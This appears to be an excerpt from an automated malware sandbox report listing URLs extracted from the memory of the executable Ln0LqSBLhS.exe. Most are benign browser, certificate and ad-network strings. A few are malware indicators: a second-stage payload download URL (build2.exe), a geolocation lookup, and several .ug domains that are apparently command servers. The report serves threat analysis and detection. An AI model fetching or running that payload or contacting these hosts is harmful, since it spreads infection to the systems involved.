                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241460701.00000000007B9000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.245022877.0000000000881000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241460701.00000000007B9000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.245022877.0000000000881000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainV
                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241460701.00000000007B9000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://docs.google.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://drive.google.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306377525.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://errors.angularjs.org/1.6.4-local
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.299713046.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.299754391.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.278691677.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=49728e55d0beb549f8c7f7d1511
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.278713947.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=7cfa2e17c501bec83581c84fbb47
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.285776177.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://github.com/requirejs/almond/LICENSE
                  Source: Ln0LqSBLhS.exe, 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000003.00000001.234275088.0000000000400000.00000040.00020000.sdmp, Ln0LqSBLhS.exe, 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmp, Ln0LqSBLhS.exe, 00000007.00000002.248521541.0000000003C10000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.291690634.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274064401.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://knockoutjs.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286442957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://modernizr.com/download/#-fontface-backgroundsize-borderimage-borderradius-boxshadow-flexbox-f
                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241460701.00000000007B9000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.245022877.0000000000881000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0F
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241460701.00000000007B9000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.285280652.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://popup.taboola.com/german
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/Organization
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.289927322.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://scrollmagic.io
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277642079.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.310170996.000000000086A000.00000004.00000001.sdmpString found in binary or memory: http://securebiz.org/dl/build2.exe
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.310170996.000000000086A000.00000004.00000001.sdmpString found in binary or memory: http://securebiz.org/dl/build2.exe$run
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.310170996.000000000086A000.00000004.00000001.sdmpString found in binary or memory: http://securebiz.org/dl/build2.exerun
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277558843.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254456470.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: http://www.amazon.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286478907.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.289949893.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306088128.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306210346.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://www.ecma-international.org/ecma-262/5.1/#sec-C
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254499243.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254525707.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: http://www.live.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277642079.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254560985.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: http://www.nytimes.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274064401.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
                  Source: Ln0LqSBLhS.exe, 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254577459.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: http://www.reddit.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254618926.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: http://www.twitter.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254639329.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: http://www.wikipedia.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304623285.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.254653052.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.290389600.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi%3Bsrc%3D2542116%3Btype%3Dclien612%3Bcat%3Dchromx%3Bord
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.255843003.00000000094C0000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://ade.googlesyndication.com/ddm/activity
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287644351.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/z/src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/regclk
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287674072.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
                  Source: Ln0LqSBLhS.exe, 00000003.00000003.236162828.0000000000792000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000002.253205865.0000000000877000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/
                  Source: Ln0LqSBLhS.exe, Ln0LqSBLhS.exe, 00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmp, Ln0LqSBLhS.exe, 00000007.00000002.248521541.0000000003C10000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000002.253127471.0000000000828000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
                  Source: Ln0LqSBLhS.exe, 00000009.00000002.253179888.0000000000849000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/geo.json/K
                  Source: Ln0LqSBLhS.exe, 00000009.00000002.253179888.0000000000849000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/geo.json1
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmpString found in binary or memory: https://api.2ip.ua/geo.json7
                  Source: Ln0LqSBLhS.exe, 00000009.00000002.253127471.0000000000828000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/geo.json?K
                  Source: Ln0LqSBLhS.exe, 00000009.00000002.253179888.0000000000849000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonk
                  Source: Ln0LqSBLhS.exe, 00000009.00000002.253205865.0000000000877000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/k
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmpString found in binary or memory: https://api.2ip.ua/w
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.285280652.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306960917.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com/js/client.js
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://apps.apple.com/app/apple-store/id1288723196?pt=80423&ct=EdgeDownloadPage&mt=8
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286755737.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.284308231.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5feba608107a43f986dad18aa360422
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286783299.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC929a5d988f01430b8db16b1888926c4
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.284338119.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCb153e68ae7e042dbb77cf3f0c8710f8
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.291331807.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.291353722.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.291384986.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286810902.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.js
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.290366374.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.285926599.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://bid.g.doubleclick.net/xbbe/pixel?d=KAE
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306960917.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://castedumessaging-pa.googleapis.com/v1
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287357715.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287357715.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://channel9.msdn.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.307015871.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.307015871.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://clients6.google.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277642079.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277642079.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277642079.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306799750.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306518235.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://crash.corp.google.com/samples?reportid=&q=
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://dl.google.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306960917.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306008578.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304457957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/document?usp=chrome_app&authuser=0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304295613.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/presentation?usp=chrome_app&authuser=0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.305824212.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/spreadsheets?usp=chrome_app&authuser=0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306008578.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_app
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settings
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.291690634.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://eus-streaming-video-rt-microsoft-com.akamaized.net/bf97d977-9974-41a5-8391-199ae4e1fb39/4521
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.291690634.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://eus-streaming-video-rt-microsoft-com.akamaized.net/c56a48ec-7fc2-4ef4-b934-bfcf0d7206fe/4521
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283120255.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://fonts.google.com/license/googlerestricted
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283120255.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283120255.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283120255.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283120255.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff)
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277846655.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=161af8ef89eb5a3baf386d6a4f1
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277923079.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=79d8737dc86cbccc6833c6f82a6a
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277796829.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=c5f7d52e564ba865fbef402f925a
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.278361077.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277923079.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod?OneDriveUpdate=346a40d59e67b656d7ac36dd216
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277746847.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod?OneDriveUpdate=40d6f54575e19c16b4b998b94f1
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277846655.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod?OneDriveUpdate=863257002496bb1d95dfbe163bc2
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.278740790.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod?OneDriveUpdate=9da9c6f613e3ae17beffc8c99676
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.277796829.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod?OneDriveUpdate=a052a3915291b6d745b28793629a
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.287357715.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306752398.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://github.com/angular/material
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274064401.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: https://github.com/douglascrockford/JSON-js
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306088128.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306210346.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://github.com/krux/postscribe/blob/master/LICENSE.
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.286478907.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: https://github.com/scottjehl/picturefill/blob/master/Authors.txt;
